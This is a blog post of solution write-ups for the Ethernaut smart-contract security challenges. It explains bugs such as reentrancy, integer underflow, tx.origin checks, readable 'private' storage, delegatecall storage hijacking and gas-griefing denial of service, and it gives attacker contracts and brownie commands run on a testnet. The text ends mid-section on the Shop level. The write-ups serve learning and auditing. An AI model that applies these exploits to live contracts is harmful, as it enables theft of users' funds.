Ethernaut solutions

July 6th, 2022

In an effort to learn and understand Solidity, to either code contracts or audit them in the future (not sure what I want to do yet), I decided to solve the Ethernaut challenges.

These were fun, engaging challenges that allowed me to learn some details, vulnerabilities and intricacies of the EVM and the Solidity programming language. Probably one of the most fun learning experiences I’ve had.

In this article I will basically copy-paste all my solution write-ups from the github repo where I uploaded all of them.

I solved these initially in a local brownie (smart contract development framework on python) using a local fork of the rinkeby test network. After solving each challenge, I then ran the scripts that would perform the transactions on the test network itself to solve the challenges.

If you want to reproduce the same environment I used for it, you can do so by following the instructions in the readme of that same github repo.

Article index

Hello Ethernaut

The first challenge consists of following a set of instructions given by the contract itself by running some functions.

This is simply an introductory lesson to understand, conceptually, how the Ethernaut challenge is done.

Submission transaction

Block explorer:



  1. you claim ownership of the contract

  2. you reduce its balance to 0


There’s two ways to become owner in this contract:

  1. Call the contribute() function with a value lower than 0.001 ETH.

  2. Now that our contribution is larger 0, we can then send ETH to the contract with a value larger than 0 and we will become owner through the receive() function.

  3. We have now become owner and can call the withdraw() function to drain the contract’s funds.

How I did it

  1. Contribute 0.0009 ETH calling the contribute() function.
fallback.contribute(_from | {'value':0.0009*1e18})

Block explorer:

  1. Send the contract 0.0009 ETH
acc.transfer(fallback, 0.0009*1e18)

Block explorer:

  1. Call the withdraw() function

Block explorer:

Submission transaction

Block explorer:

Coin Flip


“To complete this level you’ll need to use your psychic abilities to guess the correct outcome 10 times in a row.”


Generating pseudo-random numbers that are completely unpredictable is a difficult problem within the blockchain. Predicting a coinflip should have a risk of failing of at least 50%, but if we know what factors are used to generate this pseudo-random number, then we can predict the coinflip accurately with a higher probability of success than the intended 50%.

In this case we can always be right, given that there’s 2 factors that generate the coinflip:

  1. The variable FACTOR
uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
  1. The block hash of the previous block to the coinflip converted to integer
uint256 blockValue = uint256(blockhash(block.number.sub(1)));

Our coinflip is floor of the ratio between blockValue and FACTOR

uint256 coinFlip = blockValue.div(FACTOR);
bool side = coinFlip == 1 ? true : false;

The problem is then solved by creating an attacker contract that uses the same logic to generate coinflips, but instead to make the guess. Then the guess is plugged into the flip() function.

function callFlip() external {
    uint256 factor = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
    uint256 blockVal = uint256(blockhash(block.number - 1));
    uint256 division = blockVal / factor;
    bool guess = division == 1 ? true : false;

How I did it

I did exactly what I described in the solution section, but I inherited from Ownable to create the CoinFlipAttack contract as a way to restrict calling the callFlip() function only from the deployer of the attacker contract. After coding the contract I did the following steps:

  1. Deploy (at: 0xA8834Cc6c91bf94d4FB32D72815C2011CC1c2e15) the attacker contract which I labeled CoinFlipAttack.sol
coinflipattack = CoinFlipAttack.deploy(_from)
  1. Set the instance of the contract with which to interface. My contract instance of CoinFlip, in address 0x7BDa91C53648D2a17352e4055fe6834FAABbFc95 on the Rinkeby test network.
coinflipattack.setInstance('0x7BDa91C53648D2a17352e4055fe6834FAABbFc95', _from)

Block explorer:

  1. Run a loop of 10 iterations calling the callFlip() function, which will always be right in its prediction.
for _ in range(10):
    coinflipattack.callFlip(_from | {'allow_revert':True})

First tx: Block explorer:

Last tx: Block explorer:

  1. Check that we have actually won 10 times in a row by checking the consecutiveWins variable in the CoinFlip contract.
wins_assertion = coinflip.consecutiveWins() == 10

Submission transaction

Block explorer:

Minor tweaks

In order for the callFlip() transactions to go through, I had to increase the gas limit for live networks on my brownie config file:

    gas_limit: "1000000"

And also use the parameter {'allow_revert':True} when calling callFlip(), as that scenario is a possibility in the definition of flip() on CoinFlip if the previous block hash matches the next block hash, I guess in order to avoid making multiple guess attempts in the same block.

coinflipattack.callFlip(_from | {'allow_revert':True})



Claim ownership of the contract to complete this level.


The function changeOwner() compares whether the address that sends the tx (tx.origin) is the same as the address that interacts with the contract (msg.sender). In this case it isn’t, so the owner is changed as per the function’s instructions:

function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
        owner = _owner;

Therefore, the only thing needed here is a attacking contract which interacts with the original Telephone contract. This way the contract is the msg.sender while the address that interacts with the attacking contract is the tx.origin.

How I did it

  1. I deployed the contract TelephoneAttack (at: 0x756a2E146F4f9659E7c16a90948A09aB09925F19) which interfaces with the original Telephone contract and calls its changeOwner() function as follows:
function callChangeOwner(address _newOwner) external {

where _newOwner is the address we want to assign as new contract owner for the Telephone contract.

  1. Set the instance address and call the function with my account address from which I deployed the attacking contract:
telephoneattack.callChangeOwner(acc.address, _from)  

Block explorer:

  1. Check that we’re the new owner
owner_assertion = telephone.owner() == acc.address
print(f'The account owner matches my address: {owner_assertion}')

Submission transaction

Block explorer:



The goal of this level is for you to hack the basic token contract below.

You are given 20 tokens to start with and you will beat the level if you somehow manage to get your hands on any additional tokens. Preferably a very large amount of tokens.


This contract is using the solidity compiler version 0.6.0, therefore mathematical operations can lead to overflows. In this case, the vulnerability occurs when attempting to call the transfer() function:

function transfer(address _to, uint _value) public returns (bool) {
    require(balances[msg.sender] - _value >= 0);
    balances[msg.sender] -= _value;
    balances[_to] += _value;
    return true;

The line require(balances[msg.sender] - _value >= 0); checks if the user balance is larger than or equal to zero, but since balances are unsigned integers, when the number we subtract (_value) is larger than the wallet’s balance (balances[msg.sender]) of the token, an overflow occurs and the wallet’s balance becomes the largest unsigned integer minus the difference between these two values.

After passing the require statement, there is another mistake where this overflowed value is assigned to the balance of msg.sender:

balances[msg.sender] -= _value;

All we have to do to exploit the contract is call the transfer function as follows:

transfer('any address except the sending address', 21)

From the address whose funds we want to cause the overflow on.

How I did it

  1. I called the transfer() function and sent 21 tokens (1 more than the original 20 to cause an overflow) to the contract address of the Token contract.
token.transfer(EthernautContractAddresses['token'], 21, _from)

Block explorer:

  1. Check that we have actually caused an overflow by checking if our balance is above 20.
amount_assertion = token.balanceOf(acc.address) > 20
print(f'Does address {acc.address} have more than 20 tokens?: {amount_assertion}')

Submission transaction

Block explorer:



The goal of this level is for you to claim ownership of the instance you are given.


The contract Delegate defines the function pwn() which easily allows you to take control of the contract. However, to take control of the Delegation contract, we must call this pwn() function through a low level delegate call where we pass the pwn() function encoded through the data sent in a transaction that will trigger the fallback() function of the Delegation contract.

The ownership can be taken by performing a transfer of 0 wei (or low level to the Delegation contract with 0xdd365b8b in the message data. These are the first 4 bytes of the SHA-3 hash for the text 'pwn()'.

How I did it

  1. Obtain the SHA-3 hash for the text 'pwn()' using web3.sha3() from and extract the first 4 bytes of the hash.
pwn_bytes = web3.sha3(text='pwn()').hex()[0:10]
  1. Perform a simple transfer with a value of 0 but including the bytes in the tx data.
acc.transfer(to=delegation.address, amount=0, data=pwn_bytes)

Block explorer:

  1. Check whether we are owner or not
owner_assertion = delegation.owner() == acc.address
print(f'The owner of the contract is {acc.address}, therefore the assertion is {owner_assertion}')

Submission transaction

Block explorer:



The goal of this level is to make the balance of the contract greater than zero.


From my research, there’s several ways of sending funds to a contract that has no payable methods:

  1. Send funds to the address the contract will be deployed in, because contract addresses are deterministic.

  2. Send funds to the contract by destroying of another contract, which sends all of its balance through selfdestruct(<destination>).

  3. By making it the recipient of a block reward, which can’t be rejected.

Because the instance of the Force contract is already deployed, the easiest way we can complete the objective is through number 2.

How I did it

  1. Deploy an attacking contract called ForceAttack (at: 0xba2C7CAE436F3710500507d1f5cf07229C3d0C66)
forceattack = ForceAttack.deploy(_from)

And make sure the contract can receive funds and also has a function that calls selfdestruct() to the contract address of our instance:

function reload() external payable {}

function forceEtherIntoAddress(address payable _to) external onlyOwner {

I also optionally added a fallback receive() function and made the contract Ownable so that only I could call the selfdestruct() function (not that anyone would’ve done it anyway…)

  1. Send some funds into the contract.
forceattack.reload({'value': 1000} | _from)

Block explorer:

  1. Call the function that calls selfdestruct() designating my instance address as the recipient of the funds.

Block explorer:

  1. Confirm that the contract balance is > 0
balance_assertion = force.balance() > 0
print(f'Current balance of the contract is {force.balance()}, is this greater than zero: {balance_assertion}')

Submission transaction

Block explorer:



Unlock the vault to pass the level!


Sensitive data like passwords are not safe to store on the blockchain. Even in private variables, Especially if we have the source code of the contract, which is likely to be public in order to increase transparency and confidence in the piece of software, as the blockchain deals with actual money and as users we should always assume a closed source contract is trying to steal our funds.

In this case, the state variables are stored in the contract storage, and because the variable password is a 32 byte piece of data, it will always fill an entire slot, making its position very predictable in the 2nd slot of the contract, as the 2nd state variable defined.

In this case, we can easily use the function get_storage_at() on to see what the password is by looking up in the 2nd storage slot. Then we can optionally convert it to text to see what the password is. In this case, the password is:

>>> web3.toText(web3.eth.get_storage_at(vault.address, '0x01').hex())
'A very strong secret password :)'

How I did it

  1. Get the password from the contract’s storage
password = web3.eth.get_storage_at(EthernautInstances['vault'], '0x01')
  1. Unlock the vault using the password
vault.unlock(password, _from)

Block explorer:

  1. Check if the vault is locked through the locked state variable
locked_assertion = vault.locked() == False
print(f'Is the vault unlocked? {locked_assertion}')

Submission transaction

Block explorer:



When you submit the instance back to the level, the level is going to reclaim kingship. You will beat the level if you can avoid such a self proclamation.


Here all we have to do is have a contract become king as opposed to an ordinary address. So we create a contract that performs a low level call to send the funds (because transfer would run out of gas) to the King contract. The amount to send has to be greater than or equal to 0.001 ETH (1e15 wei). Once the contract takes over as king, no other contract or address can take over.

How I did it

  1. Deploy the attacking contract KingAttack (at: 0x27eb59A15364a45a53AcB341514e0fcAf44BF0Ad)
kingattack = KingAttack.deploy(EthernautInstances['king'], _from)
  1. Call the becomeKing() function, while sending enough funds to take over the contract (1e15 wei = 0.001 ether) defined in the contract as follows:
function becomeKing() external payable {
    (bool success,) = address(kingContract).call{value: msg.value}("");
    require(success, "Transfer failed.");

Calling it in python, we get the value directly from the King contract’s storage position 2, where the prize is located (located in position 2 because it is a uin256 which occupies a full slot and the first slot is occupied by an address, also 32 bytes).

kingattack.becomeKing({'value':int(web3.eth.get_storage_at(king.address, '0x01').hex(),16)} | _from)

Block explorer:

  1. Check that we have actually become King
king_assertion = king._king() == kingattack.address
print(f'The contract address {kingattack.address} is the king: {king_assertion}')

With the prior knowledge that the contract cannot be taken over by a normal address or another contract, we have effectively broken the takeover mechanism.

Submission transaction

Block explorer:



The goal of this level is for you to steal all the funds from the contract.


the Reentrance contract seems to only expect non-contract addresses to interact with it. When calling donate() through a contract and donating an amount of ETH, we can then call withdraw() and have another call to withdraw() as a fallback function where we attempt to withdraw the same amount that was sent during the donation. This allows our contract to withdraw once again from the Reentrance contract before it can actually update its balance, leading to a net loss of funds equal to the amount that was donated per transaction. If the contract had a larger amount of funds, we could basically repeat this same transaction as long as it is gas-efficient to do so and eventually deplete the contract’s funds.

How I did it

  1. Code and deploy a contract (at: 0xe2F7Cc547AE5F07C06DA81837877F0056Fb23B6a) with 4 functions, one to donate, another one to withdraw and a last one being a fallback function that can receive funds receive(). The fallback function will call the withdraw() method from the Reentrance contract. Additionally, a 4th function that withdraws the attacking contract’s funds back to the deployer.

2.We repeat the donate –> withdraw process until the contract has been drained. In this case, the contract had a total of 0.001 ETH (1e15 wei) in it, so it can be done in a single loop. Despite this, I still wanted to use a while loop for illustrative/learning purposes.

while reentrancy.balance() > 0:
    reentrancyattack.donate({'value': 1e15} | _from)
    reentrancyattack.withdraw(1e15, _from)

Block explorer:

Block explorer:

  1. Recover the funds from the attacker contract and send them to the deployer (owner, me)

Block explorer:

  1. Check if the contract has indeed been drained.
balance_assertion = reentrancy.balance() == 0
print(f"The contract's balance is {reentrancy.balance()}, The contract is {'drained' if balance_assertion else 'not drained'}")

Submission transaction

Block explorer:



This elevator won’t let you reach the top of your building. Right?


The returning value of isLastFloor() must be False for floor to change and for top to become true. Two ways to do this come to mind:

  1. We make our top floor something that isn’t 0 (the starting value of floor) and we check if floor is the number value of the top floor. Then we define the function isLastFloor() to return a comparison between the current floor and the top floor value.

  2. We make a function that sends the elevator to its current floor (0), but we run this function twice, the first time, we make sure that isLastFloor() returns false, and then after this only true. This would effectively mean that our top floor is the 0th floor. But during that second run, top becomes true.

How I did it

  1. Create and deploy a Building contract (at: 0x970b299cCB253F5b4f58fEbde41Ffe2D2b25F885) to interact with the Elevator contract where I define the isLastFloor() function:
function isLastFloor(uint256) external returns (bool) {
    lastFloorBool = elevatorContract.floor() == topFloor;
    return lastFloorBool;

And a function to go to the top floor which calls goTo() in the elevator contract:

function goToTopFloor() external {
  1. Call the goToTopFloor() function which will first see that it’s not at the top floor (floor is 0 initially), then floor changes and floor = topFloor and the second time isLastFloor() is called returns true which is then assigned to top.

Block explorer:

  1. Check that top is true
top_assertion = == True
print(f'We are at the top floor: {top_assertion}')

Submission transaction

Block explorer:



Unlock this contract to beat the level.


First, the data in the data variable must be retrieved. This can be done by extracting the data from the contract storage as it is on the blockchain. In brownie, this can be done using web3.eth.get_storage_at(), with the address of the contract in the first param and the direction of the contract storage slot to look into.

Each slot has a capacity of 32 bytes (256 bits), meaning that data types which actually fill up a 32 byte slot, are going to take up a whole slot, so the following ones roll over to the next slot. If a data type is declared as uint256 or bytes32, it will always occupy a full storage slot, as these types are already 32 bytes in size.

In the case of the Privacy contract, we know that the relevant piece of data is the last element of the array data. Therefore, to extract this, we must determine where this piece of data is, in what storage slot.

This contract’s state variables are, in order:

bool public locked = true;
uint256 public ID = block.timestamp;
uint8 private flattening = 10;
uint8 private denomination = 255;
uint16 private awkwardness = uint16(now);
bytes32[3] private data;

Therefore, the storage looks a little like this:

slot number object content
0 locked true
1 ID block timestamp
2 flattening, denomination and awkwardness uint16(now), 255, 100
3 data[0] 0x64a6f16b073f2385269a71e47d8ae45f47d73172c5c87510274dba78b584bbaa
4 data[1] 0x9a8835c8dd1948872493737460934d6db82def5f62b1108323a69dcff6391462
5 data[2] 0x1942e9d3378c23e90a2cc2f45bd4f1ec7f2fd8ed471d58024a3e1efe498c8ec5

What we’re interested in is the first 16 bytes of data[2], which is (in hex):


So then after acquiring this, all that needs to be done is simply pass it as parameter to unlock(), which will cause locked to become false.

How I did it

Exactly as I described in solution:

  1. Get the first 16 bytes of the data in the 5th storage position of the contract instance.
data_2 = web3.toBytes(hexstr=web3.eth.get_storage_at(privacy.address, '0x5').hex())[0:16].hex()
  1. Pass it to the unlock() function
privacy.unlock(data_2, _from)

Block explorer:

  1. Check that locked is false
locked_assertion = privacy.locked() == False
print(f"The contract is unlocked: {locked_assertion}")

Submission transaction

Block explorer:

Gatekeeper One


Make it past the gatekeeper and register as an entrant to pass this level.


This contract has 3 modifiers that must be passed in order to make entrant the origin of the tx (my address).

  1. The transaction calling enter() in GatekeeperOne has to be performed by a smart contract, so that msg.sender differs from tx.origin (address calling the contract that calls enter()).

  2. The remaining gas (gasleft()) after the code as ran has to be a multiple of 8191. This can be done my performing an external call to the GatekeeperOne contract where we run the enter() function and additionally send both the gas needed to perform the instructions and a multiple of 8191. I coded it as follows:

(success,) = address(gko).call{
            gas: additionalGas + 10*8191


  1. The check has 3 require statements where we must have a key of type bytes8 which has certain characteristics in order to pass the require statements. In summary, _gateKey will pass if:

In order to achieve this, we need to make some changes to tx.origin manually:

How I did it

  1. Code and deploy (at: 0xdcEae9bA04Ddb9Dfd5F9B589A0d8638e739cD01b) an attacking contract where I create a function that will call enter() in the Gatekeeper One smart contract.

The function takes a parameter address and then casts it into uint64 and then into bytes8 to pass it to enter(), as enter() takes a bytes8 parameter.

The second parameter will be a number, it can be a uint16 as we will deal with small values. This number will be the amount of gas that will be used by instructions in the Gatekeeper One contract call. A multiple of 8191 has to be added to this message call to the amount of additional gas passed through additionalGas in order to pass the 2nd check.

function callEnter(address _modifiedTxOrigin, uint16 additionalGas) public returns (bool) {
    // modified tx origin is tx origin with tweaks to pass the require statements in `enter()`
    bytes8 _modifiedTxOriginBytes = bytes8(uint64(_modifiedTxOrigin));
    bool success;

    // send a message call with a specific amount of gas + a multiple of 8191
    (success,) = address(gko).call{
        gas: additionalGas + 10*8191

    // require success
    require(success, 'call failed');

    // return result of the success
    return success;
  1. Modify my address (the tx.origin, 0x98bCCA1C6023e3F851090e079030da43d9F229d1) in order to pass the third check, in this case I used 0x0000000000000000000000000000000A000029d1. This will pass all checks as described in solution.
modified_tx_origin = f"0x{'0'*31}A0000{acc.address[-4:]}"
  1. In order to find the cost of the instructions, I decided to bruteforce the message call until at least one transaction passed and then annotate the typical cost for it. It ended up usually being 211 or 254. bruteforce is a parameter in my function used to solve the challenge, which if True will run the loop and execute 200+ txs to find the correct gas to input into additionalGas. Once I have the correct gas value, I input it in the else statement and make bruteforce=False.
if bruteforce:
    for i in range(100,300,1):
            tx = gkoattack.callEnter(modified_tx_origin, i, _from)
            print(f"Correct gas: {i}")
    tx = gkoattack.callEnter(modified_tx_origin, 211, _from)

Block explorer:

  1. Check if we are entrant
entrant_assertion = gatekeeper.entrant() == acc.address
print(f"Address is entrant: {entrant_assertion}")

Submission transaction

Block explorer:

Gatekeeper Two


Register as an entrant to pass this level.


As with Gatekeeper One, we have to successfully pass 3 modifier checks for the function enter() in order to make entrant our address.

In my opinion, this problem is significantly easier than Gatekeeper One, as the checks to pass are much easier and faster to code and are found much easier through google searches of concepts with very little reading required.

The checks are as follows:

  1. The transaction has to be sent from a contract so that the contract address (msg.sender) differs from the contract caller (tx.origin).

  2. The result of running the solidity assembly opcode extcodesize() on the function caller returns how long the caller contract code is, however, when we perform the external call from the constructor of the contract calling, extcodesize() returns zero because a contract does not have source code available during construction. This page from the Consensys smart contract best practices page details it. Thus extcodesize() is NOT a reliable way of checking whether the external call is performed by a contract or an externally owned account. All we have to do here is run the code that calls the enter() function from the constructor of our calling contract.

  3. The bitwise XOR and each element operated through it is its own inverse, so if we have that if:

uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) == uint64(0) - 1

Is true, then:

uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(0) - 1 == uint64(_gateKey)

is also true. Therefore, we don’t need _gateKey, we can simply pass the result of uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(0) - 1 as the parameter of enter() but casted to bytes8 as that’s what enter() calls for.

How I did it

  1. Code an attacker contract where we I define the contract constructor as follows:
constructor(address _instance) public {
    bytes8 gateKey = bytes8(uint64(bytes8(keccak256(abi.encodePacked(address(this))))) ^ (uint64(0) - 1));

    (bool success,) ="enter(bytes8)", gateKey));
    require(success, "external call failed");
  1. Then simply deploy the contract (at: 0x6961C8C27dC8f153c62815E0EBb0c7bb75d974E1) and on the constructor run, the enter() function is called
gk2attack = GatekeeperTwoAttack.deploy(gatekeeper.address, _from)

Block explorer:

  1. Check that my address is entrant
entrant_assertion = gatekeeper.entrant() == acc.address
print(f"Address is entrant: {entrant_assertion}")

Submission transaction

Block explorer:

Naught Coin


Complete this level by getting your token balance to 0.


The ERC20 implementation, which the NaughtCoin contract inherits from, includes functionality for externally owned accounts or contracts to transfer funds out of a specific address given that that address has approved the externally owned account or contract to transfer funds out of it.

This can be done by first calling the function approve() from the account holding the NaughtCoins and then transferFrom() to transfer the tokens out of the account from the EOA or contract that was approved initially.

In two steps:

  1. Call approve() as follows:
approve(Account2Address, Account1Balance)
  1. Call transferFrom() as follows:
transferFrom(Account1Address, Account2Address, Account1Balance)


In this case it’s also possible to send the tokens to the burn address 0x0000000000000000000000000000000000000000.

How I did it

  1. Call approve() to allow a second account to move the tokens out of the account holding them. Make sure to approve at least the entire balance of tokens in the wallet in order to drain it.
balance_in_wallet = naughtcoin.balanceOf(acc.address)
naughtcoin.approve(acc2.address, balance_in_wallet, _from)

Block explorer:

  1. Call transferFrom() to move the full token balance out of account 1 (acc) and into account 2 (acc2).
naughtcoin.transferFrom(acc.address, acc2.address, balance_in_wallet, _from2)

Block explorer:

  1. Check that the balance is indeed zero
balance_assertion = naughtcoin.balanceOf(acc.address) == 0
print(f"The account balance has been drained: {balance_assertion}")

Submission transaction

Block explorer:



The goal of this level is for you to claim ownership of the instance you are given.


The preservation contract uses the contracts allocated in the addresses timeZone1Library and timeZone2Library as library contracts. Thus, all calls to these contracts are done through delegatecall in the Preservation contract and do NOT touch the storage of each respective LibraryContract but rather the storage of the Preservation contract.

When we modify the variable storedTime through a delegatecall of the setTime() function in the library contracts, we are not modifying storedTime in neither the library or the Preservation contracts, but rather the variable occupying the respective storage slot of storedTime in the Preservation contract.

Therefore, calling either setFirstTime() or setSecondTime() will modify timeZone1Library with whatever value we pass as _timeStamp. Therefore, in order to exploit the contract and become owner, we need to deploy a contract with the same storage layout as Preservation, this means that our attacker contract should define:

address public timeZone1Library;
address public timeZone2Library;
address public owner; 

In the exact same order as Preservation.

Also, there must be two additional functions defined in the attacker contract:

function setTime(uint256) public {
    owner = tx.origin;
function setFirstTimeExploit() external {

Where preservationContract is an interface to the Preservation contract.

Therefore the flow is as follows:

  1. Make timeZone1Library the attacker contract address by calling setFirstTime() from the attacker contract.

  2. Call setFirstTime() in the Preservation contract with any unsigned integer as parameter, which executes setTime() in the attacker contract making owner our origin address.

How I did it

  1. Code and deploy (at: 0x5E51EE439b501d7e39261Df8C437dA19a28F651D) the attacker contract as described in solution
pattack = PreservationAttack.deploy(preservation.address, _from)
  1. Call setFirstTime() from the attacker contract

Block explorer:

  1. Call setFirstTime() from the address I want to make owner (my address, in this case, tx.origin), though I could have also manually hardcoded the address in the attacker contract.
preservation.setFirstTime(0, _from)

Block explorer:

  1. Check that my address is owner
owner_assertion = preservation.owner() == acc.address
print(f"My address is the contract owner {owner_assertion}")

Submission transaction

Block explorer:



This level will be completed if you can recover (or remove) the 0.001 ether from the lost contract address.


As specified in section 7 of the Ethereum yellowpaper, contract addresses are deterministic and can be derived from the deployer address of the contract and the nonce of the deployment transaction coming from deployer.

In this case we have that information from the get-go:

  1. The contract deployer address (our instance, in my case 0xc03f501C5987CAaC9e4470849f13eEA338b76E9f)

  2. The nonce of the deployment of the first SimpleToken (1 as stated on the exercise)

Therefore, we can compute the contract address of the first SimpleToken deployment easily, which results in 0xa26D4caf289D657F24f8d2D26f0DFe99a0B312db.

Technically, it is easy to cheat here, since the contract address of the contract we want to drain is easy to see on a block explorer by inspecting the internal transactions of the instance contract. However, the objective of the exercise is to derive the address ourselves.

With this information, all we have to do now is call the destroy() function in the SimpleToken contract and direct the funds within it to any address in order to mark the exercise as completed.

How I did it

  1. Once we have these two details (deployer address, nonce) as I described in solution, we can code a function in python (or directly in solidity) to obtain the address. As a resourceful developer, even though I know how to compute this, I still decided to go and find a ready made solution in StackExchange in order to skip this:
# compute address of a given contract to be deployed from
# the deployer address + nonce, as stated in the Section 7 
# of the Ethereum yellowpaper for contracts created using CREATE
def mk_contract_address(sender: str, nonce: int) -> str:
    """Create a contract address using eth-utils.
    # Modified from Mikko Ohtamaa's original answer which was later
    # edited by Utgarda
    # Obtained from
    sender_bytes = to_bytes(hexstr=sender)
    raw = rlp.encode([sender_bytes, nonce])
    h = keccak(raw)
    address_bytes = h[12:]
    return to_checksum_address(address_bytes)

I would change a few things but if it ain’t broke, don’t fix it.

  1. Then, we can plug in these values and find the address of that first ever SimpleToken deployment:
first_simpletoken_contract_address = mk_contract_address(recovery.address, 1)
  1. Connect to this contract and call the destroy() function, sending the funds to my address.
simpletoken.destroy(acc.address, _from)

Block explorer:

  1. Check that we have actually drained the contract address.
balance_assertion = simpletoken.balance() == 0
print(f"The balance of SimpleToken is zero: {balance_assertion}")

Submission transaction

Block explorer:

Magic Number


To solve this level, you only need to provide the Ethernaut with a Solver, a contract that responds to whatIsTheMeaningOfLife() with the right number.


There’s several ways to approach this problem, but in a nutshell, all that’s needed is a contract that can return the number 42 by using at most 10 opcodes in its runtime code.

I find that this article details the solution much better than I could. But as a way to document my understanding of this problem and its solution, I’ll try to write in a few steps what has to be done to successfully solve it:

  1. We must code a contract using either raw bytecode or Yul (as I did in my solution): 33600055600a6011600039600a6000f3fe602a60005260206000f3

Which is the raw bytecode representing the following opcodes:


These raw assembly opcodes can be divided into two parts:

Here’s the bytecode as returned by the Remix IDE after compiling the Yul contract I coded to solve this:

	"functionDebugData": {},
	"generatedSources": [],
	"linkReferences": {},
	"object": "33600055600a6011600039600a6000f3fe602a60005260206000f3",
	"sourceMap": "90:8:0:-:0;87:1;80:19;143;120:21;117:1;108:55;182:19;179:1;172:30"
  1. Deploy the contract to the blockchain, which we can do in several different possible ways:

There are probably more ways, but I’m not familiar with them.

  1. Set the solver calling setSolver() in the MagicNum contract.

How I did it

  1. I first needed to look for help as I had absolutely no idea how to approach this problem, but after extensive reading of how this whole thing works and some basics of opcodes and EVM assembly, I then decided to code a contract using Yul (deployed at: 0x678a4e09ec08d8fd32abc0f4e3e28469fe8b6e80), which IMO is a very readable way of attempting to do this.

The contract looks like this (It’s under /contracts/attacks/MagicNumberSolver.Yul in the repo):

// SPDX-License-Identifier: MIT
object "MagicNumberSolver" {
    code {
        sstore(0, caller())
        datacopy(0, dataoffset("Runtime"), datasize("Runtime"))
        return(0, datasize("Runtime"))
    object "Runtime" {
        code {
            mstore(0x0, 0x2a)
            return(0x0, 0x20)    

This is a million times more readable than raw bytecode or even raw opcodes, though now raw opcodes no longer look like robot instructions to me (even though they technically are).

This is the constructor of the contract (initialization opcodes), usually declared with constructor() in Solidity:

code {
    sstore(0, caller())
    datacopy(0, dataoffset("Runtime"), datasize("Runtime"))
    return(0, datasize("Runtime"))

This code basically stores the caller() in slot 0 and copies the contract code (“Runtime”) to it (datacopy()) and specifying the size of the contract code (datasize()) and the offset (dataoffset()). The name of the object containing the code (in my case “Runtime”) can be anything, it simply serves as a way to refer to it through functions like datasize(), which take a string of the name of a Yul object. The return opcode concludes the runtime of the constructor.

And this is the code of the contract itself after deployment (runtime opcodes), what is stored on the blockchain:

object "Runtime" {
    code {
        mstore(0x0, 0x2a)
        return(0x0, 0x20)    

This object also has code, and this code is also extremely short, but does what we are asked for in the exercise as requested, which is first allocate memory (mstore) on slot 0x0 with the value 0x2a which is the number 42 in hexadecimal. Then it takes that value in slot 0x0 and returns it as 0x20 which is 32 bytes.

Subsequently, I compiled and deployed the contract using the Remix IDE, which has a Yul compiler marked as experimental at the time of solving this challenge.

  1. Call the setSolver() function to set the solver to the address of the deployed contract
magicnumber.setSolver('0x678a4e09ec08d8fd32abc0f4e3e28469fe8b6e80', _from)

Block explorer:

  1. The only way to confirm this works is to either make a set up of the Ethernaut challenges locally, or just attempt to submit on the Ethernaut site, and I decided to just submit, since it can be attempted again anyway even if it’s wrong. In my case, I made a few attempts tweaking different values until I got it right, my biggest error was that in the “Runtime” object I was writing numbers in decimal instead of hexadecimal.

Submission transaction

Block explorer:

Alien Codex


Claim ownership to complete the level.


In the AlienCodex contract we can leverage the retract() function to cause an integer underflow in the length of the codex array. This underflow allows us to modify any state variable in the contract through the revise() function. The exploit can be performed as follows:

  1. Call the make_contact() function to pass the contacted() modifier check, requiring contact to be true.

  2. Call the retract() function to cause an integer overflow in the codex array length

  3. Find the hash of the owner state variable as if it were part of the codex array by:

$$2^{256} - int(0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6)$$

In Python (for example):

2**256 -  int(web3.sha3(hexstr=f'0x{"0"*63}1').hex(),16)

Which returns the hash: 0x4ef1d2ad89edf8c4d91132028e8195cdf30bb4b5053d4f8cd260341d4805f30a

  1. Using this resulting value in revise() as the i (index) of the array codex to modify and _content as our address.

How I did it

Exactly as described in solution, but using my local setup in brownie:

  1. Call make_contact()

Block explorer:

  1. Call retract()

Block explorer:

  1. Obtain the codex hash with the position of the _owner state variable in storage
position_one = encode_abi(['uint256'],[1]).hex()
owner_hash = hex(2**256 - int(web3.sha3(hexstr=f"0x{position_one}").hex(),16))
  1. Call revise() passing in my address and the hash
aliencodex.revise(owner_hash, acc.address, _from)

Block explorer:

  1. Confirm that my address is indeed the new owner
owner_assertion = aliencodex.owner() == acc.address
print(f"Address {acc.address} is the owner of the contract: {owner_assertion}")

Submission transaction

Block explorer:



If you can deny the owner from withdrawing funds when they call withdraw() (whilst the contract still has funds, and the transaction is of 1M gas or less) you will win this level.


The message call in the Denial contract does not specify an amount of gas, so we can define a receive() fallback function in our attacker contract that will be so expensive that unless the partner address is changed, it will not be possible to call the withdraw() function.

  1. Code and deploy an attacker contract. The attacker should have a receive() fallback function that runs some set of instructions that are extremely expensive.

  2. Make the attacker contract partner through the setWithdrawPartner() function.

If a specific amount to spend had been set, execution would not halt and the transfer() function in line 24 would have executed without issues.

How I did it

  1. I coded and deployed (at: 0x5708A3c4d9472B9D6951200c6d6C2FB82ef96c50) an attacker contract with a receive() fallback function defined as follows:
receive() external payable {
    while (true) {
        foreverLooping += 1;
        if (foreverLooping > 0) {foreverLooping = 0;}

Where foreverLooping is a state variable:

uint256 private foreverLooping;

In python:

denialattack = DenialAttack.deploy(denial.address, _from)
  1. I made the contract partner through a function inside the contract I defined which calls setWithdrawPartner() in Denial through an interface:
function setThisAsWithdrawPartner() public {

Where denialContract is the interface object.

In python:


Block explorer:

  1. I tested calling the withdraw() function myself within a try-except block, since I usually get an RPCRequestError when trying to access the revert_msg attribute of a reverted transaction. However, if I did get the revert_msg anyway, this would also still work:
# test withdraw() to see if the tx fails
    tx = denial.withdraw(_from | {'allow_revert':True})
    # fail tx assertion
    fail_tx_assertion = False

    # fail tx assertion
    fail_tx_assertion = True

print(f"The transaction failed/reverted: {fail_tx_assertion}")

With this call, I determine through the assertion if the action of the challenge instance will work or not.

Block explorer: (reverted tx)

Submission transaction

Block explorer:



Сan you get the item from the shop for less than the price asked?


It is possible to return different values based on the state variable isSold. After the check passes where _buyer.price() >= price && !isSold returns true, we can internally change our contract so that the value that price() returns changes based on isSold.

All we have to do is make sure the function price() returns 100 when isSold is false and a value under 100 when isSold is false.

How I did it

  1. Code and deploy a Buyer contract (at: 0xB9dcacbc393D15fEa292705d66c1549035CcB3ee) where I define the price() function as follows:
